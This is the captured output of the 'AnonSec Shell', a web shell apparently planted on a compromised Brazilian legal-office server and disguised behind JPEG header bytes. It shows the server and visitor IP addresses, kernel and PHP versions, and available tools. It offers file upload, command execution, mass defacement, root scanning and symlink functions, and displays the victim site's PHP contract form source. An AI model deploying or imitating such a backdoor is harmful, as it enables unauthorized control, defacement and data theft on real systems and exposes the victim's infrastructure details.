JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/juridico/eusebio/modulos/contrato/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/juridico/eusebio/modulos/contrato/contrato_cad.php
<?php
    /**
     * Created by PhpStorm.
     * User: RalpAlves
     * Date: 12/04/2016
     * Time: 10:48
     */
    //ini_set('display_errors', 'off');
    //$conn    = conexao::getInstance();
    $cnt_sit = $conn->query("select * from situacao ORDER BY situacao");
    $cnt_lan = $conn->query("select * from tipo_lancamento ORDER BY lancamento");
    $cnt_pes = $conn->query("select * from pessoas ORDER BY nome");
?>
<head>
    <script src="modulos/contrato/validacao.js"></script>
</head>
<div class="container panel panel-primary filterable">
    <div class="container label">
        <a href='?page=agenda/agenda'><i aling='center' class='fa fa-arrow-circle-o-left fa-2x' title='Voltar'></i></a>
        <span style="font-size:20px; color: #060606">&nbsp;&nbsp;Contrato | Inclusão</span>
    </div>
</div>
<div class="container">
    <form id="f_contrato" name="f_contrato" OnSubmit="showCarga()" method="post" action="?page=contrato/contrato_crud&var=incluir">
        <div class='panel panel-primary filterable panel-body'>
            <input type='hidden' name='codigo' id='codigo' value="0"/>
            <input type='hidden' name='cod_usuario' value="0"/>
            <div class='col-xs-12 col-sm-3 col-md-3 col-lg-3'>
                <label for='cod_contratante'>Contrante</label>
                <select name="cod_contratante" autofocus class="form-control select2">
                    <option value="999">Selecione</option>
                    <?php while ($icnt_pes = $cnt_pes->fetch(PDO::FETCH_OBJ)) { ?>
                        <option value="<?php echo $icnt_pes->codigo ?>"><?php echo $icnt_pes->nome ?></option>
                    <?php } ?>
                </select>
            </div>

            <div class='col-xs-12 col-sm-9 col-md-9 col-lg-9'>
                <label for='descricao'>descricao</label>
                <input type='text' class='form-control upper' required name='descricao' id='descricao'/></div>
            <div class='col-xs-12 col-sm-12 col-md-12 col-lg-12'>
                <label for='objeto'>objeto</label>
                <textarea class='form-control' name='objeto' id='objeto' cols='1' rows='4'></textarea></div>

            <div class='col-xs-12 col-sm-3 col-md-3 col-lg-3'>
                <label for='situacao'>Situação</label>
                <select name="situacao" class="form-control">
                    <option value="999">Selecione</option>
                    <?php while ($icnt_sit = $cnt_sit->fetch(PDO::FETCH_OBJ)) { ?>
                        <option value="<?php echo $icnt_sit->codigo ?>"><?php echo $icnt_sit->situacao ?></option>
                    <?php } ?>
                </select>
            </div>

            <div class='col-xs-12 col-sm-2 col-md-2 col-lg-2'>
                <label for='data_inicial'>Data inicial</label>
                <input type='date' class='form-control' name='data_inicial' id='data_inicial'/></div>
            <div class='col-xs-12 col-sm-2 col-md-2 col-lg-2'>
                <label for='data_final'>Data final</label>
                <input type='date' class='form-control' name='data_final' id='data_final'/></div>

            <div class='col-xs-12 col-sm-5 col-md-5 col-lg-5'>
                <label for='tipo'>Tipo lançamento</label>
                <select name="tipo" class="form-control">
                    <option value="0">Selecione</option>
                    <?php while ($icnt_lan = $cnt_lan->fetch(PDO::FETCH_OBJ)) { ?>
                        <option value="<?php echo $icnt_lan->codigo ?>"><?php echo $icnt_lan->lancamento ?></option>
                    <?php } ?>
                </select>
            </div>

            <div class='col-xs-12 col-sm-3 col-md-3 col-lg-3'>
                <label for='valor'>valor global</label>
                <input type='text' class='form-control' onkeyup="formataValor(this,event)" name='valor' id='valor'/></div>
            <div class='col-xs-12 col-sm-2 col-md-2 col-lg-2'>
                <label for='valor_mensal'>Valor mensal</label>
                <input type='text' class='form-control' onkeyup="formataValor(this,event)" name='valor_mensal' id='valor_mensal'/></div>
            <div class='col-xs-12 col-sm-2 col-md-2 col-lg-2'>
                <label for='dia_venc'>Vencimento (dia)</label>
                <input type='number' class='form-control' name='dia_venc' id='dia_venc'/></div>
            <div class='col-xs-12 col-sm-4 col-md-4 col-lg-4'>
                <label for='obs'>Observações</label>
                <textarea class='form-control' name='obs' id='obs' cols='1' rows='3'></textarea></div>

            <!--            <div class='col-xs-12 col-sm-2 col-md-2 col-lg-2'>-->
            <!--                <label for='ultimomes'>ultimomes</label>-->
            <!--                <input type='text' class='form-control' name='ultimomes' id='ultimomes'/></div>-->
            <!--            <div class='col-xs-12 col-sm-2 col-md-2 col-lg-2'>-->
            <!--                <label for='ultimoano'>ultimoano</label>-->
            <!--                <input type='text' class='form-control' name='ultimoano' id='ultimoano'/></div>-->

            <div class='col-xs-12 col-sm-1 col-md-1 col-lg-1'>
                <label for='bt_novo'>&nbsp;</label>
                <br>
                <button type="button" onclick="validaContrato();" name="bt_novo" class="btn btn-primary form-control"><i class="glyphicon glyphicon-ok"></i></button>
            </div>

        </div>
</div>
</form>
</div>

Anon7 - 2022
AnonSec Team